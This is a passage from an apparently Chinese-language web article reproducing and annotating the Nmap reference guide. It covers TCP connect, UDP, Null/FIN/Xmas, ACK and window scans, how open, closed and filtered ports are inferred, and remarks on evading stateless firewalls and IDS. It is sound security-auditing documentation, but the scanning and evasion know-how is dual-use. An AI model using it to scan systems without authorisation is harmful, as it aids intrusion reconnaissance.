\u8be5\u7aef\u53e3\u5c31\u88ab\u6807\u8bb0\u4e3a\u88ab\u8fc7\u6ee4\u3002\u5982\u679c\u6536\u5230ICMP\u4e0d\u53ef\u5230\u8fbe\u9519\u8bef (\u7c7b\u578b3\uff0c\u4ee3\u78011\uff0c2\uff0c3\uff0c9\uff0c10\uff0c\u6216\u800513)\uff0c\u8be5\u7aef\u53e3\u4e5f\u88ab\u6807\u8bb0\u4e3a\u88ab\u8fc7\u6ee4\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd0\u884c\u7684\u539f\u7406\u56fe\u5982\u4e0b\uff1a<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"http:\/\/images2015.cnblogs.com\/blog\/728493\/201601\/728493-20160109213940168-1330327960.jpg\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe6\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe6\" \/><\/figure>\n\n\n<p class=\"wp-block-paragraph\"><code>-sT<\/code>&nbsp;(TCP connect()\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53SYN\u626b\u63cf\u4e0d\u80fd\u7528\u65f6\uff0cCP Connect()\u626b\u63cf\u5c31\u662f\u9ed8\u8ba4\u7684TCP\u626b\u63cf\u3002 \u5f53\u7528\u6237\u6ca1\u6709\u6743\u9650\u53d1\u9001\u539f\u59cb\u62a5\u6587\u6216\u8005\u626b\u63cfIPv6\u7f51\u7edc\u65f6\uff0c\u5c31\u662f\u8fd9\u79cd\u60c5\u51b5\u3002 Instead of writing raw packets as most other scan types do\uff0cNmap\u901a\u8fc7\u521b\u5efa<code>connect()<\/code>&nbsp;\u7cfb\u7edf\u8c03\u7528\u8981\u6c42\u64cd\u4f5c\u7cfb\u7edf\u548c\u76ee\u6807\u673a\u4ee5\u53ca\u7aef\u53e3\u5efa\u7acb\u8fde\u63a5\uff0c\u800c\u4e0d\u50cf\u5176\u5b83\u626b\u63cf\u7c7b\u578b\u76f4\u63a5\u53d1\u9001\u539f\u59cb\u62a5\u6587\u3002 \u8fd9\u662f\u548cWeb\u6d4f\u89c8\u5668\uff0cP2P\u5ba2\u6237\u7aef\u4ee5\u53ca\u5927\u591a\u6570\u5176\u5b83\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u7528\u4ee5\u5efa\u7acb\u8fde\u63a5\u4e00\u6837\u7684 \u9ad8\u5c42\u7cfb\u7edf\u8c03\u7528\u3002\u5b83\u662f\u53eb\u505aBerkeley Sockets API\u7f16\u7a0b\u63a5\u53e3\u7684\u4e00\u90e8\u5206\u3002Nmap\u7528 \u8be5API\u83b7\u5f97\u6bcf\u4e2a\u8fde\u63a5\u5c1d\u8bd5\u7684\u72b6\u6001\u4fe1\u606f\uff0c\u800c\u4e0d\u662f\u8bfb\u53d6\u54cd\u5e94\u7684\u539f\u59cb\u62a5\u6587\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53SYN\u626b\u63cf\u53ef\u7528\u65f6\uff0c\u5b83\u901a\u5e38\u662f\u66f4\u597d\u7684\u9009\u62e9\u3002\u56e0\u4e3aNmap\u5bf9\u9ad8\u5c42\u7684&nbsp;<code>connect()<\/code>\u8c03\u7528\u6bd4\u5bf9\u539f\u59cb\u62a5\u6587\u63a7\u5236\u66f4\u5c11\uff0c \u6240\u4ee5\u524d\u8005\u6548\u7387\u8f83\u4f4e\u3002 \u8be5\u7cfb\u7edf\u8c03\u7528\u5b8c\u5168\u8fde\u63a5\u5230\u5f00\u653e\u7684\u76ee\u6807\u7aef\u53e3\u800c\u4e0d\u662f\u50cfSYN\u626b\u63cf\u8fdb\u884c \u534a\u5f00\u653e\u7684\u590d\u4f4d\u3002\u8fd9\u4e0d\u4ec5\u82b1\u66f4\u957f\u65f6\u95f4\uff0c\u9700\u8981\u66f4\u591a\u62a5\u6587\u5f97\u5230\u540c\u6837\u4fe1\u606f\uff0c\u76ee\u6807\u673a\u4e5f\u66f4\u53ef\u80fd \u8bb0\u5f55\u4e0b\u8fde\u63a5\u3002IDS(\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf)\u53ef\u4ee5\u6355\u83b7\u4e24\u8005\uff0c\u4f46\u5927\u90e8\u5206\u673a\u5668\u6ca1\u6709\u8fd9\u6837\u7684\u8b66\u62a5\u7cfb\u7edf\u3002 \u5f53Nmap\u8fde\u63a5\uff0c\u7136\u540e\u4e0d\u53d1\u9001\u6570\u636e\u53c8\u5173\u95ed\u8fde\u63a5\uff0c \u8bb8\u591a\u666e\u901aUNIX\u7cfb\u7edf\u4e0a\u7684\u670d\u52a1\u4f1a\u5728syslog\u7559\u4e0b\u8bb0\u5f55\uff0c\u6709\u65f6\u5019\u662f\u4e00\u6761\u52a0\u5bc6\u7684\u9519\u8bef\u6d88\u606f\u3002 \u6b64\u65f6\uff0c\u6709\u4e9b\u771f\u6b63\u53ef\u601c\u7684\u670d\u52a1\u4f1a\u5d29\u6e83\uff0c\u867d\u7136\u8fd9\u4e0d\u5e38\u53d1\u751f\u3002\u5982\u679c\u7ba1\u7406\u5458\u5728\u65e5\u5fd7\u91cc\u770b\u5230\u6765\u81ea\u540c\u4e00\u7cfb\u7edf\u7684 \u4e00\u5806\u8fde\u63a5\u5c1d\u8bd5\uff0c\u5979\u5e94\u8be5\u77e5\u9053\u5979\u7684\u7cfb\u7edf\u88ab\u626b\u63cf\u4e86\u3002<\/p>\n\n\n<pre class=\"wp-block-code\"><code>\u8fd9\u662f\u4e00\u79cd\u6700\u4e3a\u666e\u901a\u7684\u626b\u63cf\u65b9\u6cd5\uff0c\u8fd9\u79cd\u626b\u63cf\u65b9\u6cd5\u7684\u7279\u70b9\u662f\uff1a\u626b\u63cf\u7684\u901f\u5ea6\u5feb\uff0c\u51c6\u786e\u6027\u9ad8\uff0c\u5bf9\u64cd\u4f5c\u8005\u6ca1\u6709\u6743\u9650\u4e0a\u7684\u8981\u6c42\uff0c\u4f46\u662f\u5bb9\u6613\u88ab\u9632\u706b\u5899\u548cIDS(\u9632\u5165\u4fb5\u7cfb\u7edf)\u53d1\u73b0\n\n\u8fd0\u884c\u7684\u539f\u7406\uff1a\u901a\u8fc7\u5efa\u7acbTCP\u7684\u4e09\u6b21\u63e1\u624b\u8fde\u63a5\u6765\u8fdb\u884c\u4fe1\u606f\u7684\u4f20\u9012\n\u2460 Client\u7aef\u53d1\u9001SYN\uff1b\n\u2461 Server\u7aef\u8fd4\u56deSYN\/ACK\uff0c\u8868\u660e\u7aef\u53e3\u5f00\u653e\uff1b\n\u2462 Client\u7aef\u8fd4\u56deACK\uff0c\u8868\u660e\u8fde\u63a5\u5df2\u5efa\u7acb\uff1b\n\u2463 Client\u7aef\u4e3b\u52a8\u65ad\u5f00\u8fde\u63a5\u3002<\/code><\/pre>\n\n\n<img decoding=\"async\" data-original=\"http:\/\/images2015.cnblogs.com\/blog\/728493\/201601\/728493-20160109211021950-1764405821.jpg\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe7\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe7\" \/>\n\n\n<p class=\"wp-block-paragraph\"><code>-sU<\/code>&nbsp;(UDP\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u867d\u7136\u4e92\u8054\u7f51\u4e0a\u5f88\u591a\u6d41\u884c\u7684\u670d\u52a1\u8fd0\u884c\u5728TCP \u534f\u8bae\u4e0a\uff0c<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.rfc-editor.org\/rfc\/rfc768.txt\" rel=\"noreferrer noopener\" rel=\"nofollow\" >UDP<\/a>\u670d\u52a1\u4e5f\u4e0d\u5c11\u3002 DNS\uff0cSNMP\uff0c\u548cDHCP (\u6ce8\u518c\u7684\u7aef\u53e3\u662f53\uff0c161\/162\uff0c\u548c67\/68)\u662f\u6700\u5e38\u89c1\u7684\u4e09\u4e2a\u3002 \u56e0\u4e3aUDP\u626b\u63cf\u4e00\u822c\u8f83\u6162\uff0c\u6bd4TCP\u66f4\u56f0\u96be\uff0c\u4e00\u4e9b\u5b89\u5168\u5ba1\u6838\u4eba\u5458\u5ffd\u7565\u8fd9\u4e9b\u7aef\u53e3\u3002 \u8fd9\u662f\u4e00\u4e2a\u9519\u8bef\uff0c\u56e0\u4e3a\u53ef\u63a2\u6d4b\u7684UDP\u670d\u52a1\u76f8\u5f53\u666e\u904d\uff0c\u653b\u51fb\u8005\u5f53\u7136\u4e0d\u4f1a\u5ffd\u7565\u6574\u4e2a\u534f\u8bae\u3002 \u6240\u5e78\uff0cNmap\u53ef\u4ee5\u5e2e\u52a9\u8bb0\u5f55\u5e76\u62a5\u544aUDP\u7aef\u53e3\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">UDP\u626b\u63cf\u7528<code>-sU<\/code>\u9009\u9879\u6fc0\u6d3b\u3002\u5b83\u53ef\u4ee5\u548cTCP\u626b\u63cf\u5982 SYN\u626b\u63cf (<code>-sS<\/code>)\u7ed3\u5408\u4f7f\u7528\u6765\u540c\u65f6\u68c0\u67e5\u4e24\u79cd\u534f\u8bae\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">UDP\u626b\u63cf\u53d1\u9001\u7a7a\u7684(\u6ca1\u6709\u6570\u636e)UDP\u62a5\u5934\u5230\u6bcf\u4e2a\u76ee\u6807\u7aef\u53e3\u3002 \u5982\u679c\u8fd4\u56deICMP\u7aef\u53e3\u4e0d\u53ef\u5230\u8fbe\u9519\u8bef(\u7c7b\u578b3\uff0c\u4ee3\u78013)\uff0c \u8be5\u7aef\u53e3\u662f<code>closed<\/code>(\u5173\u95ed\u7684)\u3002 \u5176\u5b83ICMP\u4e0d\u53ef\u5230\u8fbe\u9519\u8bef(\u7c7b\u578b3\uff0c \u4ee3\u78011\uff0c2\uff0c9\uff0c10\uff0c\u6216\u800513)\u8868\u660e\u8be5\u7aef\u53e3\u662f<code>filtered<\/code>(\u88ab\u8fc7\u6ee4\u7684)\u3002 \u5076\u5c14\u5730\uff0c\u67d0\u670d\u52a1\u4f1a\u54cd\u5e94\u4e00\u4e2aUDP\u62a5\u6587\uff0c\u8bc1\u660e\u8be5\u7aef\u53e3\u662f<code>open<\/code>(\u5f00\u653e\u7684)\u3002 \u5982\u679c\u51e0\u6b21\u91cd\u8bd5\u540e\u8fd8\u6ca1\u6709\u54cd\u5e94\uff0c\u8be5\u7aef\u53e3\u5c31\u88ab\u8ba4\u4e3a\u662f&nbsp;<code>open|filtered<\/code>(\u5f00\u653e|\u88ab\u8fc7\u6ee4\u7684)\u3002 \u8fd9\u610f\u5473\u7740\u8be5\u7aef\u53e3\u53ef\u80fd\u662f\u5f00\u653e\u7684\uff0c\u4e5f\u53ef\u80fd\u5305\u8fc7\u6ee4\u5668\u6b63\u5728\u5c01\u9501\u901a\u4fe1\u3002 \u53ef\u4ee5\u7528\u7248\u672c\u626b\u63cf(<code>-sV<\/code>)\u5e2e\u52a9\u533a\u5206\u771f\u6b63\u7684\u5f00\u653e\u7aef\u53e3\u548c\u88ab\u8fc7\u6ee4\u7684\u7aef\u53e3\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">UDP\u626b\u63cf\u7684\u5de8\u5927\u6311\u6218\u662f\u600e\u6837\u4f7f\u5b83\u66f4\u5feb\u901f\u3002 \u5f00\u653e\u7684\u548c\u88ab\u8fc7\u6ee4\u7684\u7aef\u53e3\u5f88\u5c11\u54cd\u5e94\uff0c\u8ba9Nmap\u8d85\u65f6\u7136\u540e\u518d\u63a2\u6d4b\uff0c\u4ee5\u9632\u63a2\u6d4b\u5e27\u6216\u8005 \u54cd\u5e94\u4e22\u5931\u3002\u5173\u95ed\u7684\u7aef\u53e3\u5e38\u5e38\u662f\u66f4\u5927\u7684\u95ee\u9898\u3002 \u5b83\u4eec\u4e00\u822c\u53d1\u56de\u4e00\u4e2aICMP\u7aef\u53e3\u65e0\u6cd5\u5230\u8fbe\u9519\u8bef\u3002\u4f46\u662f\u4e0d\u50cf\u5173\u95ed\u7684TCP\u7aef\u53e3\u54cd\u5e94SYN\u6216\u8005Connect \u626b\u63cf\u6240\u53d1\u9001\u7684RST\u62a5\u6587\uff0c\u8bb8\u591a\u4e3b\u673a\u5728\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u9650\u5236ICMP\u7aef\u53e3\u4e0d\u53ef\u5230\u8fbe\u6d88\u606f\u3002 Linux\u548cSolaris\u5bf9\u6b64\u7279\u522b\u4e25\u683c\u3002\u4f8b\u5982\uff0c Linux 2.4.20\u5185\u6838\u9650\u5236\u4e00\u79d2\u949f\u53ea\u53d1\u9001\u4e00\u6761\u76ee\u6807\u4e0d\u53ef\u5230\u8fbe\u6d88\u606f (\u89c1<code>net\/ipv4\/icmp\u3002c<\/code>)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u63a2\u6d4b\u901f\u7387\u9650\u5236\u5e76\u76f8\u5e94\u5730\u51cf\u6162\u6765\u907f\u514d\u7528\u90a3\u4e9b\u76ee\u6807\u673a\u4f1a\u4e22\u5f03\u7684\u65e0\u7528\u62a5\u6587\u6765\u963b\u585e \u7f51\u7edc\u3002\u4e0d\u5e78\u7684\u662f\uff0cLinux\u5f0f\u7684\u4e00\u79d2\u949f\u4e00\u4e2a\u62a5\u6587\u7684\u9650\u5236\u4f7f65,536\u4e2a\u7aef\u53e3\u7684\u626b\u63cf\u8981\u82b1 18\u5c0f\u65f6\u4ee5\u4e0a\u3002\u52a0\u901fUDP\u626b\u63cf\u7684\u65b9\u6cd5\u5305\u62ec\u5e76\u53d1\u626b\u63cf\u66f4\u591a\u7684\u4e3b\u673a\uff0c\u5148\u53ea\u5bf9\u4e3b\u8981\u7aef\u53e3\u8fdb\u884c\u5feb\u901f \u626b\u63cf\uff0c\u4ece\u9632\u706b\u5899\u540e\u9762\u626b\u63cf\uff0c\u4f7f\u7528<code>--host-timeout<\/code>\u8df3\u8fc7\u6162\u901f\u7684 \u4e3b\u673a\u3002<code>-sN<\/code>;&nbsp;<code>-sF<\/code>;&nbsp;<code>-sX<\/code>&nbsp;(TCP Null\uff0cFIN\uff0cand Xmas\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e09\u79cd\u626b\u63cf\u7c7b\u578b (\u751a\u81f3\u7528\u4e0b\u4e00\u8282\u63cf\u8ff0\u7684&nbsp;<code>--scanflags<\/code>&nbsp;\u9009\u9879\u7684\u66f4\u591a\u7c7b\u578b) \u5728<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.rfc-editor.org\/rfc\/rfc793.txt\" rel=\"noreferrer noopener\" rel=\"nofollow\" >TCP RFC<\/a>&nbsp;\u4e2d\u53d1\u6398\u4e86\u4e00\u4e2a\u5fae\u5999\u7684\u65b9\u6cd5\u6765\u533a\u5206<code>open<\/code>(\u5f00\u653e\u7684)\u548c&nbsp;<code>closed<\/code>(\u5173\u95ed\u7684)\u7aef\u53e3\u3002\u7b2c65\u9875\u8bf4\u201c\u5982\u679c [\u76ee\u6807]\u7aef\u53e3\u72b6\u6001\u662f\u5173\u95ed\u7684.... \u8fdb\u5165\u7684\u4e0d\u542bRST\u7684\u62a5\u6587\u5bfc\u81f4\u4e00\u4e2aRST\u54cd\u5e94\u3002\u201d&nbsp;\u63a5\u4e0b\u6765\u7684\u4e00\u9875 \u8ba8\u8bba\u4e0d\u8bbe\u7f6eSYN\uff0cRST\uff0c\u6216\u8005ACK\u4f4d\u7684\u62a5\u6587\u53d1\u9001\u5230\u5f00\u653e\u7aef\u53e3:&nbsp;\u201c\u7406\u8bba\u4e0a\uff0c\u8fd9\u4e0d\u5e94\u8be5\u53d1\u751f\uff0c\u5982\u679c\u60a8\u786e\u5b9e\u6536\u5230\u4e86\uff0c\u4e22\u5f03\u8be5\u62a5\u6587\uff0c\u8fd4\u56de\u3002&nbsp;\u201d<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u626b\u63cf\u7cfb\u7edf\u9075\u5faa\u8be5RFC\uff0c\u5f53\u7aef\u53e3\u5173\u95ed\u65f6\uff0c\u4efb\u4f55\u4e0d\u5305\u542bSYN\uff0cRST\uff0c\u6216\u8005ACK\u4f4d\u7684\u62a5\u6587\u4f1a\u5bfc\u81f4 \u4e00\u4e2aRST\u8fd4\u56de\uff0c\u800c\u5f53\u7aef\u53e3\u5f00\u653e\u65f6\uff0c\u5e94\u8be5\u6ca1\u6709\u4efb\u4f55\u54cd\u5e94\u3002\u53ea\u8981\u4e0d\u5305\u542bSYN\uff0cRST\uff0c\u6216\u8005ACK\uff0c \u4efb\u4f55\u5176\u5b83\u4e09\u79cd(FIN\uff0cPSH\uff0cand URG)\u7684\u7ec4\u5408\u90fd\u884c\u3002Nmap\u6709\u4e09\u79cd\u626b\u63cf\u7c7b\u578b\u5229\u7528\u8fd9\u4e00\u70b9\uff1aNull\u626b\u63cf (<code>-sN<\/code>)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e0d\u8bbe\u7f6e\u4efb\u4f55\u6807\u5fd7\u4f4d(tcp\u6807\u5fd7\u5934\u662f0)<\/p>\n\n\n<p class=\"wp-block-paragraph\">NULL\u626b\u63cf\u662f\u4e00\u79cd\u53cd\u5411\u7684\u626b\u63cf\u65b9\u6cd5\uff0c\u901a\u8fc7\u53d1\u9001\u4e00\u4e2a\u6ca1\u6709\u4efb\u4f55\u6807\u5fd7\u4f4d\u7684\u6570\u636e\u5305\u7ed9\u670d\u52a1\u5668\uff0c\u7136\u540e\u7b49\u5f85\u670d\u52a1\u5668\u7684\u8fd4\u56de\u5185\u5bb9\u3002<strong>\u8fd9\u79cd\u626b\u63cf\u7684\u65b9\u6cd5\u6bd4\u524d\u9762\u63d0\u53ca\u7684\u626b\u63cf\u65b9\u6cd5\u8981\u9690\u853d\u5f88\u591a\uff0c\u4f46\u662f\u8fd9\u79cd\u65b9\u6cd5\u7684\u51c6\u786e\u5ea6\u4e5f\u662f\u8f83\u4f4e\u7684<\/strong>\uff0c \u4e3b\u8981\u7684\u7528\u9014\u662f<strong>\u7528\u6765\u5224\u65ad\u64cd\u4f5c\u7cfb\u7edf\u662f\u5426\u4e3awindows<\/strong><strong>\uff0c\u56e0\u4e3awindows\u4e0d\u9075\u5b88RFC 793\u6807\u51c6\uff0c\u4e0d\u8bba\u7aef\u53e3\u662f\u5f00\u542f\u8fd8\u662f\u5173\u95ed\u7684\u90fd\u8fd4\u56deRST\u5305<\/strong><\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"http:\/\/images2015.cnblogs.com\/blog\/728493\/201601\/728493-20160109215518606-1869150777.jpg\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe8\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe8\" \/><\/figure>\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u662f\u867d\u7136NULL\u5177\u6709\u8fd9\u6837\u7684\u4e00\u4e9b\u7528\u5904\uff0c\u4f46\u662f\u672c\u4eba\u5374\u8ba4\u4e3a\u4e0d\u5b9c\u4f7f\u7528NULL<br>1\u3001NULL\u65b9\u6cd5\u7684\u7cbe\u786e\u5ea6\u4e0d\u9ad8\uff0c\u7aef\u53e3\u7684\u72b6\u6001\u8fd4\u56de\u7684\u4e0d\u662f\u5f88\u51c6\u786e<br>2\u3001\u8981\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u7684\u8fd0\u884c\u7cfb\u7edf\uff0c\u53ef\u4ee5\u4f7f\u7528\u53c2\u6570(-O),\u5bf9\u4e8e\u4e00\u4e9b\u64cd\u4f5c\u7cfb\u7edf\u65e0\u6cd5\u51c6\u786e\u5224\u65ad\u7684\uff0c\u53ef\u4ee5\u52a0\u4e0a\u53c2\u6570(-osscan-guess)<br>3\u3001NULL\u626b\u63cf\u6613\u88ab\u8fc7\u6ee4<br>FIN\u626b\u63cf (<code>-sF<\/code>)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u53ea\u8bbe\u7f6eTCP FIN\u6807\u5fd7\u4f4d\u3002FIN\u626b\u63cf\u7684\u539f\u7406\u4e0eNULL\u626b\u63cf\u7684\u539f\u7406\u57fa\u672c\u4e0a\u662f\u4e00\u6837\u7684\u3002Xmas\u626b\u63cf (<code>-sX<\/code>)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8bbe\u7f6eFIN\uff0cPSH\uff0c\u548cURG\u6807\u5fd7\u4f4d\uff0c\u5c31\u50cf\u70b9\u4eae\u5723\u8bde\u6811\u4e0a\u6240\u6709\u7684\u706f\u4e00\u6837\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u4e86\u63a2\u6d4b\u62a5\u6587\u7684\u6807\u5fd7\u4f4d\u4e0d\u540c\uff0c\u8fd9\u4e09\u79cd\u626b\u63cf\u5728\u884c\u4e3a\u4e0a\u5b8c\u5168\u4e00\u81f4\u3002 \u5982\u679c\u6536\u5230\u4e00\u4e2aRST\u62a5\u6587\uff0c\u8be5\u7aef\u53e3\u88ab\u8ba4\u4e3a\u662f&nbsp;<code>closed<\/code>(\u5173\u95ed\u7684)\uff0c\u800c\u6ca1\u6709\u54cd\u5e94\u5219\u610f\u5473\u7740 \u7aef\u53e3\u662f<code>open|filtered(\u5f00\u653e\u6216\u8005\u88ab\u8fc7\u6ee4\u7684)<\/code>\u3002 \u5982\u679c\u6536\u5230ICMP\u4e0d\u53ef\u5230\u8fbe\u9519\u8bef(\u7c7b\u578b 3\uff0c\u4ee3\u53f7 1\uff0c2\uff0c3\uff0c9\uff0c10\uff0c\u6216\u800513)\uff0c\u8be5\u7aef\u53e3\u5c31\u88ab\u6807\u8bb0\u4e3a&nbsp;<code>\u88ab\u8fc7\u6ee4\u7684<\/code>\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e9b\u626b\u63cf\u7684\u5173\u952e\u4f18\u52bf\u662f\u5b83\u4eec\u80fd\u8eb2\u8fc7\u4e00\u4e9b\u65e0\u72b6\u6001\u9632\u706b\u5899\u548c\u62a5\u6587\u8fc7\u6ee4\u8def\u7531\u5668\u3002 \u53e6\u4e00\u4e2a\u4f18\u52bf\u662f\u8fd9\u4e9b\u626b\u63cf\u7c7b\u578b\u751a\u81f3\u6bd4SYN\u626b\u63cf\u8fd8\u8981\u9690\u79d8\u4e00\u4e9b\u3002\u4f46\u662f\u522b\u4f9d\u8d56\u5b83 -- \u591a\u6570 \u73b0\u4ee3\u7684IDS\u4ea7\u54c1\u53ef\u4ee5\u53d1\u73b0\u5b83\u4eec\u3002\u4e00\u4e2a\u5f88\u5927\u7684\u4e0d\u8db3\u662f\u5e76\u975e\u6240\u6709\u7cfb\u7edf\u90fd\u4e25\u683c\u9075\u5faaRFC 793\u3002 \u8bb8\u591a\u7cfb\u7edf\u4e0d\u7ba1\u7aef\u53e3\u5f00\u653e\u8fd8\u662f\u5173\u95ed\uff0c\u90fd\u54cd\u5e94RST\u3002 \u8fd9\u5bfc\u81f4\u6240\u6709\u7aef\u53e3\u90fd\u6807\u8bb0\u4e3a<code>closed<\/code>(\u5173\u95ed\u7684)\u3002 \u8fd9\u6837\u7684\u64cd\u4f5c\u7cfb\u7edf\u4e3b\u8981\u6709Microsoft Windows\uff0c\u8bb8\u591aCisco\u8bbe\u5907\uff0cBSDI\uff0c\u4ee5\u53caIBM OS\/400\u3002 \u4f46\u662f\u8fd9\u79cd\u626b\u63cf\u5bf9\u591a\u6570UNIX\u7cfb\u7edf\u90fd\u80fd\u5de5\u4f5c\u3002\u8fd9\u4e9b\u626b\u63cf\u7684\u53e6\u4e00\u4e2a\u4e0d\u8db3\u662f \u5b83\u4eec\u4e0d\u80fd\u8fa8\u522b<code>open<\/code>(\u5f00\u653e\u7684)\u7aef\u53e3\u548c\u4e00\u4e9b\u7279\u5b9a\u7684&nbsp;<code>filtered<\/code>(\u88ab\u8fc7\u6ee4\u7684)\u7aef\u53e3\uff0c\u4ece\u800c\u8fd4\u56de&nbsp;<code>open|filtered(\u5f00\u653e\u6216\u8005\u88ab\u8fc7\u6ee4\u7684)<\/code>\u3002<code>-sA<\/code>&nbsp;(TCP ACK\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u79cd\u626b\u63cf\u4e0e\u76ee\u524d\u4e3a\u6b62\u8ba8\u8bba\u7684\u5176\u5b83\u626b\u63cf\u7684\u4e0d\u540c\u4e4b\u5904\u5728\u4e8e \u5b83\u4e0d\u80fd\u786e\u5b9a<code>open<\/code>(\u5f00\u653e\u7684)\u6216\u8005&nbsp;<code>open|filtered(\u5f00\u653e\u6216\u8005\u8fc7\u6ee4\u7684)<\/code>)\u7aef\u53e3\u3002 \u5b83\u7528\u4e8e\u53d1\u73b0\u9632\u706b\u5899\u89c4\u5219\uff0c\u786e\u5b9a\u5b83\u4eec\u662f\u6709\u72b6\u6001\u7684\u8fd8\u662f\u65e0\u72b6\u6001\u7684\uff0c\u54ea\u4e9b\u7aef\u53e3\u662f\u88ab\u8fc7\u6ee4\u7684\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">ACK\u626b\u63cf\u63a2\u6d4b\u62a5\u6587\u53ea\u8bbe\u7f6eACK\u6807\u5fd7\u4f4d(\u9664\u975e\u60a8\u4f7f\u7528&nbsp;<code>--scanflags<\/code>)\u3002\u5f53\u626b\u63cf\u672a\u88ab\u8fc7\u6ee4\u7684\u7cfb\u7edf\u65f6\uff0c&nbsp;<code>open<\/code>(\u5f00\u653e\u7684)\u548c<code>closed<\/code>(\u5173\u95ed\u7684) \u7aef\u53e3 \u90fd\u4f1a\u8fd4\u56deRST\u62a5\u6587\u3002Nmap\u628a\u5b83\u4eec\u6807\u8bb0\u4e3a&nbsp;<code>unfiltered<\/code>(\u672a\u88ab\u8fc7\u6ee4\u7684)\uff0c\u610f\u601d\u662f ACK\u62a5\u6587\u4e0d\u80fd\u5230\u8fbe\uff0c\u4f46\u81f3\u4e8e\u5b83\u4eec\u662f<code>open<\/code>(\u5f00\u653e\u7684)\u6216\u8005&nbsp;<code>closed<\/code>(\u5173\u95ed\u7684) \u65e0\u6cd5\u786e\u5b9a\u3002\u4e0d\u54cd\u5e94\u7684\u7aef\u53e3 \u6216\u8005\u53d1\u9001\u7279\u5b9a\u7684ICMP\u9519\u8bef\u6d88\u606f(\u7c7b\u578b3\uff0c\u4ee3\u53f71\uff0c2\uff0c3\uff0c9\uff0c10\uff0c \u6216\u800513)\u7684\u7aef\u53e3\uff0c\u6807\u8bb0\u4e3a&nbsp;<code>filtered<\/code>(\u88ab\u8fc7\u6ee4\u7684)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">ACK\u626b\u63cf\u7684\u539f\u7406\u662f\u53d1\u9001\u4e00\u4e2aACK\u5305\u7ed9\u76ee\u6807\u4e3b\u673a\uff0c\u4e0d\u8bba\u76ee\u6807\u4e3b\u673a\u7684\u7aef\u53e3\u662f\u5426\u5f00\u542f\uff0c\u90fd\u4f1a\u8fd4\u56de\u76f8\u5e94\u7684RST\u5305\uff0c\u901a\u8fc7\u5224\u65adRST\u5305\u4e2d\u7684TTL\u6765\u5224\u65ad\u7aef\u53e3\u662f\u5426\u5f00\u542f<br>\u8fd0\u884c\u539f\u7406\u56fe\uff1a<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"http:\/\/images2015.cnblogs.com\/blog\/728493\/201601\/728493-20160109223704262-616951675.jpg\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe9\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe9\" \/><\/figure>\n\n\n<p class=\"wp-block-paragraph\"><code>-sW<\/code>&nbsp;(TCP\u7a97\u53e3\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u4e86\u5229\u7528\u7279\u5b9a\u7cfb\u7edf\u7684\u5b9e\u73b0\u7ec6\u8282\u6765\u533a\u5206\u5f00\u653e\u7aef\u53e3\u548c\u5173\u95ed\u7aef\u53e3\uff0c\u5f53\u6536\u5230RST\u65f6\u4e0d\u603b\u662f\u6253\u5370<code>unfiltered<\/code>\uff0c \u7a97\u53e3\u626b\u63cf\u548cACK\u626b\u63cf\u5b8c\u5168\u4e00\u6837\u3002 \u5b83\u901a\u8fc7\u68c0\u67e5\u8fd4\u56de\u7684RST\u62a5\u6587\u7684TCP\u7a97\u53e3\u57df\u505a\u5230\u8fd9\u4e00\u70b9\u3002 \u5728\u67d0\u4e9b\u7cfb\u7edf\u4e0a\uff0c\u5f00\u653e\u7aef\u53e3\u7528\u6b63\u6570\u8868\u793a\u7a97\u53e3\u5927\u5c0f(\u751a\u81f3\u5bf9\u4e8eRST\u62a5\u6587) 